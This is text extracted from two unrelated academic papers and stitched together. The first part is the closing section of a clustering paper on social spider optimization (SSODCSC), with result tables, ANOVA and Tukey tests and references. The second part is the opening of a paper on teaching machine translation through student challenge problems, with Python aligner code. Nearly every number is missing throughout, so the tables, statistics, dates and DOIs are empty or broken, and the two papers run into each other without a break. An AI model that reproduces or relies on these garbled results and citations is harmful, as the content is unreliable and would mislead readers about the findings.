best spiders dimension dimension dimension dimension spider . . . . spider . . . . spider . . . . table best six spiders of vowel dataset: ssodcsc. best spiders dimension dimension dimension spider . , . , . spider . , . , . spider . , . , . spider . , . , . spider . , . , . spider . . , . table best three spiders of cmc dataset: ssodcsc. best spiders dimension dimension dimension dimension dimension dimension dimension dimension dimension spider . . . . . . . . . spider . . . . . . . . . spider . . . . . . . . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table specifies the average cpu time per iteration (in seconds), when clustering algorithms were applied on the cmc dataset. it was found that ssodcsc produces clustering results with the shortest average cpu time per iteration. table specifies the average cpu time per iteration (in seconds), when clustering algorithms were applied on the vowel dataset. it was found that k-means produces clustering results with the shortest average cpu time per iteration. the ssodcsc has the second shortest average cpu time per iteration. table specifies f-measure values obtained by the clustering algorithms when they are applied on the iris, glass, vowel, wine, cancer, and cmc datasets, respectively. it is evident that ssodcsc produces the best f-measure values. the overall percentage increase in the f-measure value is approximately %. we computed the icd and inter-cluster distances of the resultant clusters of the clustering algorithms when applied on uci datasets. from figs. to it is obvious that table best three spiders of wine dataset: ssodcsc. best spiders dimension dimension dimension dimension dimension dimension dimension dimension dimension dimension dimension dimension dimension spider . . . . . . . . . . . . . spider . . . . . . . . . . . . . spider . . . . . . . . . . . . , . table best six spiders of glass dataset: ssodcsc. best spiders dimension dimension dimension dimension dimension dimension dimension dimension dimension spider . . . . . . . . . spider . . . . . . . . . spider . . . . . . . . . spider . . . . . . . . . spider . . . . . . . . . spider . . . . . . . . . table comparison of clustering algorithms in terms of average cpu time per iteration (in seconds): cmc dataset. k-means pso ibco aco smsso bfgsa sos sso ssodcsc best . . . . . . . . . average . . . . . . . . . worst . . . . . . . . . table comparison of clustering algorithms in terms of average cpu time per iteration (in seconds): vowel dataset. k-means pso ibco aco smsso bfgsa sos sso ssodcsc best . . . . . . . . . average . . . . . . . . . worst . . . . . . . . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ssodcsc produces the smallest icd for uci datasets. from figs. to it can be concluded that ssodcsc produces the largest inter-cluster distances for uci datasets, as compared with other clustering algorithms. table specifies the comparison between clustering algorithms with respect to the average silhouette coefficient values of uci datasets. ssodcsc produces better average silhouette coefficient values for uci datasets also. the average silhouette coefficient values produced by ssodcsc are . , . , . , . , . , and . for wine, cancer, cmc, vowel, iris, and glass datasets, respectively. 
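the cpu-time tables above (best, average, and worst seconds per iteration) can be reproduced with a small timing harness of the following kind; this is an assumed measurement procedure rather than the authors' benchmarking code:

import time

def cpu_time_per_iteration(run_one_iteration, iterations=50):
    # run_one_iteration performs a single iteration of a clustering
    # algorithm; returns the best, average, and worst cpu seconds observed
    times = []
    for _ in range(iterations):
        start = time.process_time()
        run_one_iteration()
        times.append(time.process_time() - start)
    return min(times), sum(times) / len(times), max(times)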
statistical analysis: patent corpus datasets to show the significance of the proposed algorithm, we applied a one-way anova test on the accuracy values shown in table . sum, sum squared, mean, and variance of the clustering algorithms are specified in table . table comparison of clustering algorithms in terms of f-measure values: uci datasets. dataset k-means pso ga abc ibco aco smsso bfgsa sos sso ssodcsc wine . . . . . . . . . . . cancer . . . . . . . . . . . cmc . . . . . . . . . . . vowel . . . . . . . . . . . iris . . . . . . . . . . . glass . . . . . . . . . . . note: the best values are specified in bold. figure intra-cluster distances: uci datasets: iris and glass datasets. the figure compares the clustering algorithms based on intra-cluster distances when applied on iris and glass datasets. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure intra-cluster distances: uci datasets: wine and bupa datasets. the figure compares intra- cluster distances of clustering algorithms when applied on wine and bupa datasets. full-size doi: . /peerj-cs. /fig- figure intra-cluster distances: uci datasets: haberman, cancer, and cmc datasets. the figure compares intra-cluster distances of clustering algorithms when applied on haberman, cancer, and cmc datasets. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure inter-cluster distances: uci datasets: iris, haberman, cancer, and cmc. the figure compares inter-cluster distances of clustering algorithms when applied on iris, haberman, cancer, and cmc datasets. full-size doi: . /peerj-cs. /fig- figure inter-cluster distances: uci datasets: glass, wine, and bupa datasets. the figure compares inter-cluster distances of clustering algorithms when applied on glass, wine, and bupa datasets. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ degrees of freedom: df = , df = sum of squares for treatment (sstr) = , . sum of squares for error (sse) = , . table average silhouette coefficient value: uci datasets. dataset k-means pso ga abc ibco aco smsso bfgsa sos sso ssodcsc wine . . . . . . . . . . . cancer . . . . . . . . . . . cmc . . . . . . . . . . . vowel . . . . . . . . . . . iris . . . . . . . . . . . glass . . . . . . . . . . . note: the best values are specified in bold. table statistical results of one-way anova test when applied on accuracy values returned by clustering algorithms for patent corpus datasets. dataset sum sum squared mean variance k-means . , . . . pso . , . . . ga . , . . . abc . , . . . ibco . , . . . aco . , . . . smsso . , . . . bfgsa . , . . . sos . , . . . sso . , . . . ssodcsc . , . . . table statistical results of one-way anova test when applied on f-measure values returned by clustering algorithms for uci datasets. dataset sum sum squared mean variance k-means . , . . . pso . , . . . ga . , . . . abc . , . . . ibco . , . . . aco . , . . . smsso . , . . . bfgsa . , . . . sos . , . . . sso . , . . . ssodcsc . , . . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . 
/peerj-cs. https://peerj.com/computer-science/ total sum of squares (sst = sse + sstr) = , . mean square treatment (mstr = sstr/df ) = . mean square error (mse = sse/df ) = . f (= mstr/mse) = . probability of calculated f = . f critical ( % one tailed) = . we can reject the null hypothesis as calculated f ( . ) is greater than f critical ( . ). ) post-hoc analysis using tukeys’ honestly significant difference method: assuming significance level of %. studentized range for df = and df = is . . tukey honestly significant difference = . . mean of k-means and ssodcsc differs as . is greater than . . mean of pso and ssodcsc differs as . is greater than . . mean of genetic algorithms (ga) and ssodcsc differs as . is greater than . . mean of artificial bee colony (abc) and ssodcsc differs as . is greater than . . mean of improved bee colony optimization (ibco) and ssodcsc differs as . is greater than . . mean of aco and ssodcsc differs as . is greater than . . mean of smsso and ssodcsc differs as . is greater than . . mean of bfgsa and ssodcsc differs as . is greater than . . mean of sos and ssodcsc differs as . is greater than . . mean of sso and ssodcsc differs as . is greater than . . therefore, it may be concluded that ssodcsc significantly differs from other clustering algorithms. statistical analysis: uci datasets to show the significance of the proposed algorithm, we applied a one-way anova test on the f-measure values shown in table . sum, sum squared, mean, and variance of the clustering algorithms are specified in table . degrees of freedom: df = , df = . sum of squares for treatment (sstr) = , . . sum of squares for error (sse) = , . . total sum of squares (sst = sse + sstr) = , . . mean square treatment (mstr = sstr/df ) = . . mean square error (mse = sse/df ) = . . f (= mstr/mse) = . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ probability of calculated f = . . f critical ( % one tailed) = . . so, we can reject the null hypothesis as calculated f ( . ) is greater than f critical ( . ). ) post-hoc analysis using tukeys’ honestly significant difference method assuming significance level of %. studentized range for df = and df = is . . tukey honestly significant difference = . . means of ga and ssodcsc differ as . is greater than . . means of abc and ssodcsc differ as . is greater than . . means of ibco and ssodcsc differ as . is greater than . . means of aco and ssodcsc differ as . is greater than . . means of smsso and ssodcsc differ as . is greater than . . means of bfgsa and ssodcsc differ as . is greater than . . means of sos and ssodcsc differ as . is greater than . . therefore, it is obvious that ssodcsc significantly differs from most of the other clustering algorithms when applied on uci datasets. discussion we applied our proposed algorithm on patent corpus datasets (patentcorpus , ) and uci datasets (lickman, ). if the population size is small then the optimal solution is hard to find. if it is large, then the optimal solution is guaranteed with a side effect of higher computational complexity. we used spiders to obtain the optimal solution without the side effect of higher computational complexity. among these spiders, % were female spiders and the remaining were male spiders. the tp value was set to . . 
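the quantities reported in the statistical analyses above (sstr, sse, mstr, mse, the f statistic, and the tukey honestly significant difference) follow the standard one-way anova decomposition. the sketch below recomputes them from per-algorithm score lists; it is an illustrative reconstruction of the procedure, not the authors' analysis script:

import numpy as np

def one_way_anova(groups):
    # groups: one list of scores per clustering algorithm (treatment),
    # e.g. its accuracy or f-measure on each dataset
    groups = [np.asarray(g, dtype=float) for g in groups]
    scores = np.concatenate(groups)
    grand_mean = scores.mean()
    sstr = sum(len(g) * (g.mean() - grand_mean) ** 2 for g in groups)  # treatment
    sse = sum(((g - g.mean()) ** 2).sum() for g in groups)             # error
    df1, df2 = len(groups) - 1, len(scores) - len(groups)
    mstr, mse = sstr / df1, sse / df2
    return mstr / mse, mse, (df1, df2)       # f statistic, mse, degrees of freedom

def tukey_hsd(q_critical, mse, group_size):
    # two algorithm means differ significantly when the absolute difference
    # of their means exceeds this threshold (equal group sizes assumed)
    return q_critical * np.sqrt(mse / group_size)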
we compared the clustering results of ssodcsc with other clustering algorithms such as k-means, pso, ga, abc optimization, aco, ibco (forsati, keikha & shamsfard, ), smsso, bfgsa, sos, and sso implementation in which each spider is a collection of k centroids, and found that ssodcsc produces better clustering results. in order to conduct experiments, we formed the patent corpus dataset by taking text documents that belong to six different classes, patent corpus dataset by taking text documents that belong to seven different classes, patent corpus dataset by taking text documents that belong to nine different classes, patent corpus dataset by taking text documents that belong to nine different classes, patent corpus dataset by taking text documents that belong to eight different classes, and patent corpus dataset by taking text documents that belong to seven different classes of patent corpus data repository. the clustering quality can be validated using icd and inter-cluster distances. the smaller value for intra-cluster distance and a larger value for inter-cluster distance are the requirements for any clustering algorithm. we computed the icd and inter-cluster distances of the resultant clusters of the clustering algorithms, when applied on patent thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ corpus datasets and uci datasets, and found that ssodcsc produces better results than the other clustering algorithms. we compared the clustering algorithms on the basis of average cpu time per iteration (in seconds). we found that ssodcsc has the shortest average cpu time per iteration with respect to most of the datasets. the reasons for this are its ability to produce a better solution space after every iteration, to initialize the solution space in less time, to compute fitness values of the spiders in less time, and to find the next positions of the spiders in less time. we compared the clustering algorithms on the basis of the average silhouette coefficient value. we found that ssodcsc produces better average silhouette coefficient values for both patent corpus datasets and uci datasets. we conducted a one-way anova test separately on the clustering results of patent corpus datasets and uci datasets to show the superiority and applicability of the proposed method with respect to text datasets and feature based datasets. conclusion in this paper, we proposed a novel implementation of sso for data clustering using a single centroid representation and enhanced mating. additionally, we allowed non-dominant male spiders to mate with female spiders by converting them into dominant males. as a result, the explorative power of the algorithm has been increased and thereby the chance of getting a global optimum has been improved. we compared ssodcsc with other state-of-the-art algorithms and found that it produces better clustering results. we applied ssodcsc on patent corpus text datasets and uci datasets and got better clustering results than other algorithms. we conducted a one-way anova test to show its superiority and applicability with respect to text datasets and feature-based datasets. future work will include the study of applicability of ssodcsc in data classification of brain computer interfaces. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. 
author contributions � ravichandran thalamala conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, studying literature. � janet barnabas conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � a.v. reddy conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools. data availability the following information was supplied regarding data availability: the two datasets are available in the supplemental files. the proposed algorithm was applied on text data files in patentcorpus datasets and feature/attribute-based uci datasets. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aloise d, deshpande a, hansen p, popat p. . np-hardness of euclidean sum-of-squares clustering. machine learning ( ): – doi . /s - - - . alswaitti m, albughdadi m, isa nam. . density-based particle swarm optimization algorithm for data clustering. expert systems with applications : – doi . /j.eswa. . . . beil f, ester m, xu x. . frequent term-based text clustering. in: proceedings of international conference on knowledge discovery and data mining kdd ‘ , alberta, – . bernábe-loranca b, gonzalez-velázquez r, olivares-benítez e, ruiz-vanoye j, martínez-flores j. . extensions to k-medoids with balance restrictions over the cardinality of the partitions. journal of applied research and technology ( ): – doi . /s - ( ) - . chandran tr, reddy av, janet b. . an effective implementation of social spider optimization for text document clustering using single cluster approach. in: second international conference on inventive communication and computational technologies (icicct), coimbatore, – . chen s, sun t, yang f, sun h, guan y. . an improved optimum-path forest clustering algorithm for remote sensing image segmentation. computers & geosciences : – doi . /j.cageo. . . . costa kap, pereira lam, nakamura rym, pereira cr, papa jp, falcão ax. . a nature-inspired approach to speed up optimum-path forest clustering and its application to intrusion detection in computer networks. information sciences : – doi . /j.ins. . . . cuevas e, cienfuegos m. . a new algorithm inspired in the behavior of the social-spider for constrained optimization. expert systems with applications ( ): – doi . /j.eswa. . . . cuevas e, cienfuegos m, zaldívar d, pérez-cisneros m. . a swarm optimization algorithm inspired in the behavior of the social-spider. expert systems with applications ( ): – doi . /j.eswa. . . . de andrade silva j, hruschka er, gama j. . an evolutionary algorithm for clustering data streams with a variable number of clusters. expert systems with applications : – doi . /j.eswa. . . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . 
/j.eswa. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ forsati r, keikha a, shamsfard m. . an improved bee colony optimization algorithm with an application to document clustering. neurocomputing : – . guha s, rastogi r, shim k. . cure: an efficient clustering algorithm for large databases. acm sigmod record ( ): – doi . / . . han xh, quan l, xiong xy, almeter m, xiang j, lan y. . a novel data clustering algorithm based on modified gravitational search algorithm. engineering applications of artificial intelligence : – doi . /j.engappai. . . . jothi r, mohanty sk, ojha a. . fast approximate minimum spanning tree based clustering algorithm. neurocomputing : – doi . /j.neucom. . . . karypis g, han e-h, kumar v. . chameleon: hierarchical clustering using dynamic modeling. computer ( ): – doi . / . . lickman m. . uci machine learning repository. available at https://archive.ics.uci.edu/ml/ datasets.php. mihai d, mocanu m. . statistical considerations on the k-means algorithm. annals of the university of craiova, mathematics and computer science series ( ): – . nayak j, naik b, kanungo dp, behera hs. . a hybrid elicit teaching learning based optimization with fuzzy c-means (etlbo-fcm) algorithm for data clustering. ain shams engineering journal ( ): – doi . /j.asej. . . . nayak j, nanda m, nayak k, naik b, behera hs. . an improved firefly fuzzy c-means (fafcm) algorithm for clustering real world data sets. in: kumar kundu m, mohapatra d, konar a, chakraborty a, eds. advanced computing, networking and informatics, vol. . smart innovation, systems and technologies. vol. . cham: springer. ng rt, han j. . clarans: a method for clustering objects for spatial data mining. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . patentcorpus . . patent corpus datasets. available at http://www.ezcodesample. com/semanticsearchart/downloadsdatacorpus.html. rani y, rohil h. . a study of hierarchical clustering algorithm. international journal of information and computation technology ( ): – . shukla up, nanda sj. . parallel social spider clustering algorithm for high dimensional datasets. engineering applications of artificial intelligence : – doi . /j.engappai. . . . steinley d. . k-means clustering: a half-century synthesis. british journal of mathematical and statistical psychology ( ): – doi . / x . thalamala rc, reddy av, janet b. . a novel bio-inspired algorithm based on social spiders for improving performance and efficiency of data clustering. epub ahead of print february . journal of intelligent systems doi . /jisys- - . zhang t, ramakrishnan r, livny m. . birch: an efficient data clustering method for very large databases. in: proceedings of the acm sigmod international conference on management of data, montreal, – . zhou y, wu h, luo q, abdel-baset m. . automatic data clustering using nature-inspired symbiotic organism search algorithm. knowledge-based systems : – doi . /j.knosys. . . . zhou y, zhou y, luo q, abdel-basset m. . a simplex method-based social spider optimization algorithm for clustering analysis. engineering applications of artificial intelligence : – doi . /j.engappai. . . . thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / . https://archive.ics.uci.edu/ml/datasets.php https://archive.ics.uci.edu/ml/datasets.php http://dx.doi.org/ . 
learning to translate with products of novices: a suite of open-ended challenge problems for teaching mt

adam lopez, matt post, chris callison-burch, jonathan weese, juri ganitkevitch, narges ahmidi, olivia buzek, leah hanson, beenish jamil, matthias lee, ya-ting lin, henry pao, fatima rivera, leili shahriyari, debu sinha, adam teichert, stephen wampler, michael weinberger, daguang xu, lin yang, and shang zhao∗

department of computer science, johns hopkins university
human language technology center of excellence, johns hopkins university
computer and information science department, university of pennsylvania

abstract: machine translation (mt) draws from several different disciplines, making it a complex subject to teach. there are excellent pedagogical texts, but problems in mt and current algorithms for solving them are best learned by doing. as a centerpiece of our mt course, we devised a series of open-ended challenges for students in which the goal was to improve performance on carefully constrained instances of four key mt tasks: alignment, decoding, evaluation, and reranking. students brought a diverse set of techniques to the problems, including some novel solutions which performed remarkably well. a surprising and exciting outcome was that student solutions or their combinations fared competitively on some tasks, demonstrating that even newcomers to the field can help improve the state-of-the-art on hard nlp problems while simultaneously learning a great deal. the problems, baseline code, and results are freely available.

introduction

a decade ago, students interested in natural language processing arrived at universities having been exposed to the idea of machine translation (mt) primarily through science fiction. today, incoming students have been exposed to services like google translate since they were in secondary school or earlier. for them, mt is science fact. so it makes sense to teach statistical mt, either on its own or as a unit in a class on natural language processing (nlp), machine learning (ml), or artificial intelligence (ai). (∗ the first five authors were instructors and the remaining authors were students in the work described here. this research was conducted while chris callison-burch was at johns hopkins university.) a course that promises to show students how google translate works and teach them how to build something like it is especially appealing, and several universities and summer schools now offer such classes. there are excellent introductory texts: depending on the level of detail required, instructors can choose from a comprehensive mt textbook (koehn, ), a chapter of a popular nlp textbook (jurafsky and martin, ), a tutorial survey (lopez, ), or an intuitive tutorial on the ibm models (knight, b), among many others. but mt is not just an object of academic study. it's a real application that isn't fully perfected, and the best way to learn about it is to build an mt system. this can be done with open-source toolkits such as moses (koehn et al., ), cdec (dyer et al., ), or joshua (ganitkevitch et al., ), but these systems are not designed for pedagogy.
they are mature codebases featuring tens of thousands of source code lines, making it difficult to focus on their core algorithms. most tutorials present them as black boxes. but our goal is for students to learn the key techniques in mt, and ideally to learn by doing. black boxes are incompatible with this goal. we solve this dilemma by presenting students with concise, fully-functioning, self-contained com- ponents of a statistical mt system: word alignment, decoding, evaluation, and reranking. each imple- mentation consists of a naı̈ve baseline algorithm in less than lines of python code. we assign them to students as open-ended challenges in which the goal is to improve performance on objective eval- uation metrics as much as possible. this setting mirrors evaluations conducted by the nlp research community and by the engineering teams behind high-profile nlp projects such as google translate and ibm’s watson. while we designate specific al- gorithms as benchmarks for each task, we encour- age creativity by awarding more points for the best systems. as additional incentive, we provide a web- based leaderboard to display standings in real time. in our graduate class on mt, students took a va- riety of different approaches to the tasks, in some cases devising novel algorithms. a more exciting re- sult is that some student systems or combinations of systems rivaled the state of the art on some datasets. designing mt challenge problems our goal was for students to freely experiment with different ways of solving mt problems on real data, and our approach consisted of two separable com- ponents. first, we provided a framework that strips key mt problems down to their essence so students could focus on understanding classic algorithms or invent new ones. second, we designed incentives that motivated them to improve their solutions as much as possible, encouraging experimentation with approaches beyond what we taught in class. . decoding, reranking, evaluation, and alignment for mt (dreamt) we designed four assignments, each corresponding to a real subproblem in mt: alignment, decoding, evaluation, and reranking. from the more general perspective of ai, they emphasize the key problems of unsupervised learning, search, evaluation design, and supervised learning, respectively. in real mt systems, these problems are highly interdependent, a point we emphasized in class and at the end of each assignment—for example, that alignment is an exer- cise in parameter estimation for translation models, that model choice is a tradeoff between expressivity and efficient inference, and that optimal search does not guarantee optimal accuracy. however, present- ing each problem independently and holding all else constant enables more focused exploration. for each problem we provided data, a naı̈ve solu- tion, and an evaluation program. following bird et al. ( ) and madnani and dorr ( ), we imple- mented the challenges in python, a high-level pro- http://alopez.github.io/dreamt gramming language that can be used to write very concise programs resembling pseudocode. , by de- fault, each baseline system reads the test data and generates output in the evaluation format, so setup required zero configuration, and students could be- gin experimenting immediately. for example, on re- ceipt of the alignment code, aligning data and eval- uating results required only typing: > align | grade students could then run experiments within minutes of beginning the assignment. 
three of the four challenges also included unla- beled test data (except the decoding assignment, as explained in § ). we evaluated test results against a hidden key when assignments were submitted. . incentive design we wanted to balance several pedagogical goals: un- derstanding of classic algorithms, free exploration of alternatives, experience with typical experimental design, and unhindered collaboration. machine translation is far from solved, so we ex- pected more than reimplementation of prescribed al- gorithms; we wanted students to really explore the problems. to motivate exploration, we made the as- signments competitive. competition is a powerful force, but must be applied with care in an educa- tional setting. we did not want the consequences of ambitious but failed experiments to be too dire, and we did not want to discourage collaboration. for each assignment, we guaranteed a passing grade for matching the performance of a specific tar- get algorithm. typically, the target was important but not state-of-the-art: we left substantial room for improvement, and thus competition. we told stu- dents the exact algorithm that produced the target ac- curacy (though we expected them to derive it them- selves based on lectures, notes, or literature). we did not specifically require them to implement it, but the guarantee of a passing grade provided a power- ful incentive for this to be the first step of each as- signment. submissions that beat this target received additional credit. the top five submissions received full credit, while the top three received extra credit. http://python.org some well-known mt systems have been implemented in python (chiang, ; huang and chiang, ). thanks to an anonymous reviewer for this turn of phrase. this scheme provided strong incentive to continue experimentation beyond the target algorithm. for each assignment, students could form teams of any size, under three rules: each team had to pub- licize its formation to the class, all team members agreed to receive the same grade, and teams could not drop members. our hope was that these require- ments would balance the perceived competitive ad- vantage of collaboration against a reluctance to take (and thus support) teammates who did not contribute to the competitive effort. this strategy worked: out of sixteen students, ten opted to work collaboratively on at least one assignment, always in pairs. we provided a web-based leaderboard that dis- played standings on the test data in real time, iden- tifying each submission by a pseudonymous han- dle known only to the team and instructors. teams could upload solutions as often as they liked before the assignment deadline. the leaderboard displayed scores of the default and target algorithms. this in- centivized an early start, since teams could verify for themselves when they met the threshold for a passing grade. though effective, it also detracted from realism in one important way: it enabled hill- climbing on the evaluation metric. in early assign- ments, we observed a few cases of this behavior, so for the remaining assignments, we modified the leaderboard so that changes in score would only be reflected once every twelve hours. this strategy trades some amount of scientific realism for some measure of incentive, a strategy that has proven effective in other pedagogical tools with real-time feedback (spacco et al., ). 
to obtain a grade, teams were required to sub- mit their results, share their code privately with the instructors, and publicly describe their experimen- tal process to the class so that everyone could learn from their collective effort. teams were free (but not required) to share their code publicly at any time. grades depend on institutional norms. in our case, high grades in the rest of class combined with matching all assignment tar- get algorithms would earn a b+; beating two target algorithms would earn an a-; top five placement on any assignment would earn an a; and top three placement compensated for weaker grades in other course criteria. everyone who completed all four assignments placed in the top five at least once. the equilibrium point is a single team, though this team would still need to decide on a division of labor. one student contem- plated organizing this team, but decided against it. some did so after the assignment deadline. the alignment challenge the first challenge was word alignment: given a par- allel text, students were challenged to produce word- to-word alignments with low alignment error rate (aer; och and ney, ). this is a variant of a classic assignment not just in mt, but in nlp gen- erally. klein ( ) describes a version of it, and we know several other instructors who use it. in most of these, the object is to implement ibm model or , or a hidden markov model. our version makes it open-ended by asking students to match or beat an ibm model baseline. . data we provided , sentences of parallel data from the canadian hansards, totaling around two million words. this dataset is small enough to align in a few minutes with our implementation—enabling rapid experimentation—yet large enough to obtain reasonable results. in fact, liang et al. ( ) report alignment accuracy on data of this size that is within a fraction of a point of their accuracy on the com- plete hansards data. to evaluate, we used manual alignments of a small fraction of sentences, devel- oped by och and ney ( ), which we obtained from the shared task resources organized by mihal- cea and pedersen ( ). the first sentences of the corpus were development data, with manual alignments provided in a separate file. test data con- sisted of an additional sentences, for which we did not provide alignments. . implementation we distributed three python programs with the data. the first, align, computes dice’s coefficient ( ) for every pair of french and english words, then aligns every pair for which its value is above an adjustable threshold. our implementation (most of among them, jordan boyd-graber, john denero, philipp koehn, and slav petrov (personal communication). http://www.isi.edu/natural-language/download/hansard/ this invited the possibility of cheating, since alignments of the test data are publicly available on the web. we did not adver- tise this, but as an added safeguard we obfuscated the data by distributing the test sentences randomly throughout the file. listing the default aligner in dreamt: thresh- olding dice’s coefficient. for (f, e) in bitext: for f_i in set(f): f_count[f_i] += for e_j in set(e): fe_count[(f_i,e_j)] += for e_j in set(e): e_count[e_j] += for (f_i, e_j) in fe_count.keys(): dice[(f_i,e_j)] = \ . 
* fe_count[(f_i, e_j)] / \ (f_count[f_i] + e_count[e_j]) for (f, e) in bitext: for (i, f_i) in enumerate(f): for (j, e_j) in enumerate(e): if dice[(f_i,e_j)] >= cutoff: print "%i-%i " % (i,j) which is shown in listing ) is quite close to pseu- docode, making it easy to focus on the algorithm, one of our pedagogical goals. the grade program computes aer and optionally prints an alignment grid for sentences in the development data, showing both human and automatic alignments. finally the check program verifies that the results represent a valid solution, reporting an error if not—enabling students to diagnose bugs in their submissions. the default implementation enabled immediate experimentation. on receipt of the code, students were instructed to align the first , sentences and compute aer using a simple command. > align -n | grade by varying the number of input sentences and the threshold for an alignment, students could immediately see the effect of various parameters on alignment quality. we privately implemented ibm model (brown et al., ) as the target algorithm for a passing grade. we ran it for five iterations with english as the target language and french as the source. our implementation did not use null alignment or symmetrization—leaving out these common im- provements offered students the possibility of dis- covering them independently, and thereby rewarded. a e r × - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s d u e figure : submission history for the alignment challenge. dashed lines represent the default and baseline system performance. each colored line represents a student, and each dot represents a submission. for clarity, we show only submissions that improved the student’s aer. . challenge results we received submissions from teams over a period of two weeks (figure ). everyone eventually matched or exceeded ibm model aer of . . most students implemented ibm model , but we saw many other solutions, indicating that many truly experimented with the problem: • implementing heuristic constraints to require alignment of proper names and punctuation. • running the algorithm on stems rather than sur- face words. • initializing the first iteration of model with parameters estimated on the observed align- ments in the development data. • running model for many iterations. most re- searchers typically run model for five itera- tions or fewer, and there are few experiments in the literature on its behavior over many iter- ations, as there are for hidden markov model taggers (johnson, ). our students carried out these experiments, reporting runs of , , , and even iterations. no improve- ment was observed after iterations. • implementing various alternative approaches from the literature, including ibm model (brown et al., ), competitive linking (melamed, ), and smoothing (moore, ). one of the best solutions was competitive linking with dice’s coefficient, modified to incorporate the observation that alignments tend to be monotonic by restricting possible alignment points to a window of eight words around the diagonal. although simple, it acheived an aer of . , an error reduction over model of more than %. the best score compares unfavorably against a state-of-the-art aer of . (liu et al., ). 
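the passing-grade target for this assignment, ibm model 1, fits in roughly the same amount of code as the dice baseline above. the sketch below is a compact em trainer and aligner written in the same spirit; it omits null alignment and symmetrization, as the target did, and is an illustrative reconstruction rather than the instructors' private implementation:

from collections import defaultdict

def train_model1(bitext, iterations=5):
    # bitext: list of (f, e) sentence pairs, each a list of words;
    # t[(f_word, e_word)] estimates p(f_word | e_word)
    t = defaultdict(lambda: 1.0)              # any constant works as a uniform start
    for _ in range(iterations):
        count, total = defaultdict(float), defaultdict(float)
        for (f, e) in bitext:                 # e-step: expected alignment counts
            for f_i in f:
                z = sum(t[(f_i, e_j)] for e_j in e)
                for e_j in e:
                    c = t[(f_i, e_j)] / z
                    count[(f_i, e_j)] += c
                    total[e_j] += c
        for (f_i, e_j) in count:              # m-step: renormalize
            t[(f_i, e_j)] = count[(f_i, e_j)] / total[e_j]
    return t

def align_model1(bitext, t):
    # align each french word to its most probable english word under t
    for (f, e) in bitext:
        links = ["%i-%i" % (i, max(range(len(e)), key=lambda j: t[(f[i], e[j])]))
                 for i in range(len(f))]
        print(" ".join(links))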
viewed differently, however, the best student score still represents a significant amount of progress for an effort taking just over two weeks: on the original challenge from which we obtained the data (mihalcea and pedersen, ), the best student system would have placed fifth out of fifteen systems. consider also the combined effort of all the students: when we trained a perceptron classifier on the development data, taking each student's prediction as a feature, we obtained an aer of . , which would have placed fourth on the original challenge. this is notable since none of the systems incorporated first-order dependencies on the alignments of adjacent words, long noted as an important feature of the best alignment models (och and ney, ). yet a simple system combination of student assignments is as effective as a hidden markov model trained on a comparable amount of data (och and ney, ). it is important to note that aer does not necessarily correlate with downstream performance, particularly on the hansards dataset (fraser and marcu, ). we used the conclusion of the assignment as an opportunity to emphasize this point.

the decoding challenge

the second challenge was decoding: given a fixed translation model and a set of input sentences, students were challenged to produce translations with the highest model score. this challenge introduced the difficulties of combinatorial optimization under a deceptively simple setup: the model we provided was a simple phrase-based translation model (koehn et al., ) consisting only of a phrase table and trigram language model. under this simple model, for a french sentence f of length I, an english sentence e of length J, and an alignment a in which each element consists of a span in both e and f such that every word in both e and f is aligned exactly once, the conditional probability of e and a given f is as follows.

    p(e, a \mid f) = \prod_{\langle i, i', j, j' \rangle \in a} p(f_i^{i'} \mid e_j^{j'}) \; \prod_{j=1}^{J+1} p(e_j \mid e_{j-1}, e_{j-2})    ( )

to evaluate output, we compute the conditional probability of e as follows.

    p(e \mid f) = \sum_{a} p(e, a \mid f)    ( )

